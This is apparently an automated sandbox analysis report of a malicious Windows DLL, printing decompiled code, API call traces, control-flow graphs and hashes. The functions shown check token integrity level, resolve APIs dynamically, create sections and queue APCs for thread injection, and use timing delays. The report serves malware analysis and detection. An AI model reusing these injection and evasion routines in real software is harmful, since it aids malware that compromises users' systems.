                                                  0x00ec1bc8
                                                  0x00ec1bcd
                                                  0x00ec1bcf
                                                  0x00ec1bcf
                                                  0x00ec1bad
                                                  0x00ec1baf
                                                  0x00ec1bdb
                                                  0x00ec1bdc
                                                  0x00ec1bdc
                                                  0x00ec1bab
                                                  0x00ec1bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00EC22EA,?,?,4D283A53,?,?), ref: 00EC1B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00EC1B51
                                                  • _snwprintf.NTDLL ref: 00EC1B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,00ECD2A8,00000004,00000000,00001000,?), ref: 00EC1B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00EC22EA,?,?,4D283A53), ref: 00EC1BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00EC1BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00EC22EA,?,?), ref: 00EC1BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00EC22EA,?,?,4D283A53), ref: 00EC1BE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: dbb564dbe760a42c49e2dd9aac76bb104ffad9db179294e84398032103a7b7da
                                                  • Instruction ID: f4171833578ef8be31c1b44e295968a3b3268f1b0f6d34229aa6dec2cacb773c
                                                  • Opcode Fuzzy Hash: dbb564dbe760a42c49e2dd9aac76bb104ffad9db179294e84398032103a7b7da
                                                  • Instruction Fuzzy Hash: 6421F072604208FFC721ABA5CD06FDA77A8AF49710F2501A5F609F72A1E672A9078B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 258 ec924f-ec926a 259 ec9309-ec9315 258->259 260 ec9270-ec9289 OpenProcessToken 258->260 261 ec9308 260->261 262 ec928b-ec92b6 GetTokenInformation * 2 260->262 261->259 263 ec92fe-ec9307 CloseHandle 262->263 264 ec92b8-ec92c5 call ec2049 262->264 263->261 267 ec92fd 264->267 268 ec92c7-ec92d8 GetTokenInformation 264->268 267->263 269 ec92da-ec92f4 GetSidSubAuthorityCount GetSidSubAuthority 268->269 270 ec92f7-ec92f8 call ec9039 268->270 269->270 270->267
                                                  C-Code - Quality: 100%
                                                  			E00EC924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xecd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00EC2049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00EC9039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                  0x00ec925c
                                                  0x00ec9263
                                                  0x00ec926a
                                                  0x00ec927e
                                                  0x00ec9289
                                                  0x00ec92a1
                                                  0x00ec92ae
                                                  0x00ec92b1
                                                  0x00ec92b6
                                                  0x00ec92c1
                                                  0x00ec92c5
                                                  0x00ec92d4
                                                  0x00ec92d8
                                                  0x00ec92f4
                                                  0x00ec92f4
                                                  0x00ec92f8
                                                  0x00ec92f8
                                                  0x00ec92fd
                                                  0x00ec9301
                                                  0x00ec9307
                                                  0x00ec9308
                                                  0x00ec930f
                                                  0x00ec9315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00EC9281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00EC92A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00EC92B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00EC9301
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00EC92D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00EC92DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00EC92EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 24ef6cf9dd2bbab8b687cfe0e09c72c33e18e8a657a574e929678ceb67e2bbfc
                                                  • Instruction ID: b538e94a7a7e4dd0ea22a9aa5d1001c71ab9f76fbe3d57ec6b09367dce861806
                                                  • Opcode Fuzzy Hash: 24ef6cf9dd2bbab8b687cfe0e09c72c33e18e8a657a574e929678ceb67e2bbfc
                                                  • Instruction Fuzzy Hash: 45215E7590025DFFEB009F95DD85EEEBBB9EB04304F00007AE910B2161D7724E06EB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC163F, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 272 ec163f-ec168b SysAllocString 273 ec17af-ec17b2 272->273 274 ec1691-ec16bd 272->274 275 ec17bd-ec17c0 273->275 276 ec17b4-ec17b7 SafeArrayDestroy 273->276 280 ec17ac 274->280 281 ec16c3-ec16cf call ec2436 274->281 278 ec17cb-ec17d2 275->278 279 ec17c2-ec17c5 SysFreeString 275->279 276->275 279->278 280->273 281->280 284 ec16d5-ec16e5 281->284 284->280 286 ec16eb-ec1711 IUnknown_QueryInterface_Proxy 284->286 286->280 288 ec1717-ec172b 286->288 290 ec172d-ec1730 288->290 291 ec1769-ec176c 288->291 290->291 292 ec1732-ec1749 StrStrIW 290->292 293 ec176e-ec1773 291->293 294 ec17a3-ec17a8 291->294 295 ec174b-ec1754 call ec52f9 292->295 296 ec1760-ec1763 SysFreeString 292->296 293->294 297 ec1775-ec1780 call ec1a70 293->297 294->280 295->296 302 ec1756-ec175e call ec2436 295->302 296->291 301 ec1785-ec1789 297->301 301->294 303 ec178b-ec1790 301->303 302->296 304 ec179e 303->304 305 ec1792-ec179c 303->305 304->294 305->294
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 00EC1680
                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00EC1702
                                                  • StrStrIW.SHLWAPI(?,006E0069), ref: 00EC1741
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC1763
                                                    • Part of subcall function 00EC52F9: SysAllocString.OLEAUT32(00ECC2B0), ref: 00EC5349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 00EC17B7
                                                  • SysFreeString.OLEAUT32(?), ref: 00EC17C5
                                                    • Part of subcall function 00EC2436: Sleep.KERNELBASE(000001F4), ref: 00EC247E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                  • String ID:
                                                  • API String ID: 2118684380-0
                                                  • Opcode ID: 5776265c08922423d83ebadfb59231fa9e42240fdd513e8e4a42ac59ff88af3f
                                                  • Instruction ID: 28c058556218325304e3a2c892da10aaf7e2d39f6351fe83451ae13f1fd87d25
                                                  • Opcode Fuzzy Hash: 5776265c08922423d83ebadfb59231fa9e42240fdd513e8e4a42ac59ff88af3f
                                                  • Instruction Fuzzy Hash: A4513C76900209EFCB00DFA8C984DAEB7F6FF89340B15986DE515EB220D732AD46CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401A0F, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 308 401a0f-401a21 call 401de1 311 401ae2 308->311 312 401a27-401a5c GetModuleHandleA GetProcAddress 308->312 315 401ae9-401af0 311->315 313 401ada-401ae0 call 401dfc 312->313 314 401a5e-401a72 GetProcAddress 312->314 313->315 314->313 316 401a74-401a88 GetProcAddress 314->316 316->313 318 401a8a-401a9e GetProcAddress 316->318 318->313 320 401aa0-401ab4 GetProcAddress 318->320 320->313 321 401ab6-401ac7 call 401eb5 320->321 323 401acc-401ad1 321->323 323->313 324 401ad3-401ad8 323->324 324->315
                                                  C-Code - Quality: 100%
                                                  			E00401A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E00401DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x404150 + 0x405014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x404150 + 0x405151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E00401DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x404150 + 0x405161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x404150 + 0x405174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x404150 + 0x405189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x404150 + 0x40519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401EB5(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                  0x00401a1d
                                                  0x00401a21
                                                  0x00401ae2
                                                  0x00401a27
                                                  0x00401a3f
                                                  0x00401a4e
                                                  0x00401a55
                                                  0x00401a59
                                                  0x00401a5c
                                                  0x00401ada
                                                  0x00401adb
                                                  0x00401a5e
                                                  0x00401a6b
                                                  0x00401a6f
                                                  0x00401a72
                                                  0x00000000
                                                  0x00401a74
                                                  0x00401a81
                                                  0x00401a85
                                                  0x00401a88
                                                  0x00000000
                                                  0x00401a8a
                                                  0x00401a97
                                                  0x00401a9b
                                                  0x00401a9e
                                                  0x00000000
                                                  0x00401aa0
                                                  0x00401aad
                                                  0x00401ab1
                                                  0x00401ab4
                                                  0x00000000
                                                  0x00401ab6
                                                  0x00401abc
                                                  0x00401ac2
                                                  0x00401ac7
                                                  0x00401ace
                                                  0x00401ad1
                                                  0x00000000
                                                  0x00401ad3
                                                  0x00401ad6
                                                  0x00401ad6
                                                  0x00401ad1
                                                  0x00401ab4
                                                  0x00401a9e
                                                  0x00401a88
                                                  0x00401a72
                                                  0x00401a5c
                                                  0x00401af0

                                                  APIs
                                                    • Part of subcall function 00401DE1: HeapAlloc.KERNEL32(00000000,?,00401556,00000208,00000000,00000000,?,?,?,004016A9,?), ref: 00401DED
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                    • Part of subcall function 00401EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00401F12
                                                    • Part of subcall function 00401EB5: memset.NTDLL ref: 00401F34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                  • String ID:
                                                  • API String ID: 1632424568-0
                                                  • Opcode ID: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                  • Instruction ID: a5b725abbf619f5b34b99e3f49f5d91652d314a6d7b06be396a476ddccf995a6
                                                  • Opcode Fuzzy Hash: e65ed0cd1a0425a40dfe6a27f9fba2ccd83eda7beb229b0a6519b31ca7f91d5c
                                                  • Instruction Fuzzy Hash: E9211EB160160AAFD710DFA9DD88E6B7BECEF483447004476E905EB361D774E9018F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401AFA, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 325 401afa-401b0e 326 401b10-401b11 325->326 327 401b7f-401b8c InterlockedDecrement 325->327 328 401b17-401b24 InterlockedIncrement 326->328 329 401bcc-401bd3 326->329 327->329 330 401b8e-401b94 327->330 328->329 331 401b2a-401b3e HeapCreate 328->331 332 401bc0-401bc6 HeapDestroy 330->332 333 401b96 330->333 334 401b40-401b71 call 4015ee call 4012dc 331->334 335 401b7a-401b7d 331->335 332->329 336 401b9b-401bab SleepEx 333->336 334->329 343 401b73-401b76 334->343 335->329 338 401bb4-401bba CloseHandle 336->338 339 401bad-401bb2 336->339 338->332 339->336 339->338 343->335
                                                  C-Code - Quality: 86%
                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x404108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x40410c;
						if( *0x40410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x404118;
								if( *0x404118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x40410c);
						}
						HeapDestroy( *0x404110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x404108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x404110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x404130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E004012DC(E0040111A, E004015EE(_a12, 1, 0x404118, _t41));
							 *0x40410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                  0x00401afd
                                                  0x00401b09
                                                  0x00401b0b
                                                  0x00401b0e
                                                  0x00401b84
                                                  0x00401b8a
                                                  0x00401b8c
                                                  0x00401b8e
                                                  0x00401b94
                                                  0x00401b96
                                                  0x00401b9b
                                                  0x00401b9e
                                                  0x00401ba9
                                                  0x00401bab
                                                  0x00000000
                                                  0x00000000
                                                  0x00401bad
                                                  0x00401bb0
                                                  0x00401bb2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00401bb2
                                                  0x00401bba
                                                  0x00401bba
                                                  0x00401bc6
                                                  0x00401bc6
                                                  0x00401b10
                                                  0x00401b11
                                                  0x00401b31
                                                  0x00401b37
                                                  0x00401b39
                                                  0x00401b3e
                                                  0x00401b7a
                                                  0x00401b7a
                                                  0x00401b40
                                                  0x00401b48
                                                  0x00401b4f
                                                  0x00401b59
                                                  0x00401b65
                                                  0x00401b6c
                                                  0x00401b71
                                                  0x00401b76
                                                  0x00000000
                                                  0x00401b76
                                                  0x00401b71
                                                  0x00401b3e
                                                  0x00401b11
                                                  0x00401bd3

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(00404108), ref: 00401B1C
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401B31
                                                    • Part of subcall function 004012DC: CreateThread.KERNEL32 ref: 004012F3
                                                    • Part of subcall function 004012DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                    • Part of subcall function 004012DC: GetLastError.KERNEL32(00000000), ref: 00401313
                                                    • Part of subcall function 004012DC: TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                    • Part of subcall function 004012DC: CloseHandle.KERNEL32(00000000), ref: 00401324
                                                    • Part of subcall function 004012DC: SetLastError.KERNEL32(00000000), ref: 0040132D
                                                  • InterlockedDecrement.KERNEL32(00404108), ref: 00401B84
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 00401B9E
                                                  • CloseHandle.KERNEL32 ref: 00401BBA
                                                  • HeapDestroy.KERNEL32 ref: 00401BC6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                  • String ID:
                                                  • API String ID: 2110400756-0
                                                  • Opcode ID: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                  • Instruction ID: 792522c7080727e056b4609bb1b29018c808fce2ea1d8660a7d1a9546f28a125
                                                  • Opcode Fuzzy Hash: 85dc79e01d7bf63c4f8ea18c305ee8395bb64e936cc71f747414f0cd9447c82b
                                                  • Instruction Fuzzy Hash: 5421A4B1600205ABC7109F69ED89E1A7FB8F7A4351710413BF615F72F1E7789D408B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC6A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00EC6A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xecd238 = _t10;
				if(_t10 != 0) {
					 *0xecd1a8 = GetTickCount();
					_t12 = E00EC8F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L00ECB226();
							_t33 = _t14 + _t16;
							_t18 = E00EC7E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E00EC6B96(_t25) != 0) {
							 *0xecd260 = 1; // executed
						}
						_t12 = E00EC225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                  0x00ec6a56
                                                  0x00ec6a5c
                                                  0x00ec6a5d
                                                  0x00ec6a69
                                                  0x00ec6a71
                                                  0x00ec6a76
                                                  0x00ec6a86
                                                  0x00ec6a8b
                                                  0x00ec6a92
                                                  0x00ec6a94
                                                  0x00ec6a99
                                                  0x00ec6a9f
                                                  0x00ec6aa5
                                                  0x00ec6aaf
                                                  0x00ec6ab3
                                                  0x00ec6ab5
                                                  0x00ec6aba
                                                  0x00ec6abb
                                                  0x00ec6abc
                                                  0x00ec6ac1
                                                  0x00ec6ac7
                                                  0x00ec6ad0
                                                  0x00ec6ad1
                                                  0x00ec6ad6
                                                  0x00ec6adc
                                                  0x00ec6ae8
                                                  0x00ec6aea
                                                  0x00ec6aea
                                                  0x00ec6af4
                                                  0x00ec6af4
                                                  0x00ec6a78
                                                  0x00ec6a7a
                                                  0x00ec6a7a
                                                  0x00ec6afe

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC6A69
                                                  • GetTickCount.KERNEL32 ref: 00EC6A7D
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00EC807D,?), ref: 00EC6A99
                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,00EC807D,?), ref: 00EC6A9F
                                                  • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00EC6ABC
                                                  • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC6AD6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                  • Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: 1b976b7205e7a001cf54ad430cc3b4bc11336c3e119be92f0753ec7f3d623172
                                                  • Instruction ID: ffcc55c0f838c0ab64b920145b0348ec0e97f57350a54e7812d1f380d55b7755
                                                  • Opcode Fuzzy Hash: 1b976b7205e7a001cf54ad430cc3b4bc11336c3e119be92f0753ec7f3d623172
                                                  • Instruction Fuzzy Hash: 2611E572A04200BFE724AB75ED0BF5B76D8DB44350F10453CF909F61A0EAB3D8078666
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004012DC, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 359 4012dc-4012fd CreateThread 360 401334-401337 359->360 361 4012ff-401310 QueueUserAPC 359->361 361->360 362 401312-401333 GetLastError TerminateThread CloseHandle SetLastError 361->362 362->360
                                                  C-Code - Quality: 100%
                                                  			E004012DC(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x40414c, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                                  0x004012f3
                                                  0x004012f9
                                                  0x004012fd
                                                  0x00401308
                                                  0x00401310
                                                  0x00401319
                                                  0x0040131d
                                                  0x00401324
                                                  0x0040132b
                                                  0x0040132d
                                                  0x00401333
                                                  0x00401310
                                                  0x00401337

                                                  APIs
                                                  • CreateThread.KERNEL32 ref: 004012F3
                                                  • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 00401308
                                                  • GetLastError.KERNEL32(00000000), ref: 00401313
                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 0040131D
                                                  • CloseHandle.KERNEL32(00000000), ref: 00401324
                                                  • SetLastError.KERNEL32(00000000), ref: 0040132D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                  • String ID:
                                                  • API String ID: 3832013932-0
                                                  • Opcode ID: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                  • Instruction ID: f5107841804292b3b09bf02656a39ff33859dc1d0ce8cd21f452a75bd9d4c98c
                                                  • Opcode Fuzzy Hash: cd0faf53fd1fb904e4ab0bbb06b9567a901d65b3bce5edb2fc0928527926f53e
                                                  • Instruction Fuzzy Hash: 68F05E32502220FBE6115FA0AD08F9FBF6CFB08712F004425FA01B1164C7348A008BAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00EC225B, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 57%
                                                  			E00EC225B(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00EC550E();
				if(_t21 != 0) {
					_t59 =  *0xecd25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xecd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xecd164(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00EC3D0D( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xecd27c; // 0x213a5a8
					if( *0xecd25c > 5) {
						_t8 = _t26 + 0xece5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xecea15; // 0x44283a44
						_t27 = _t7;
					}
					E00EC1BF4(_t27, _t27);
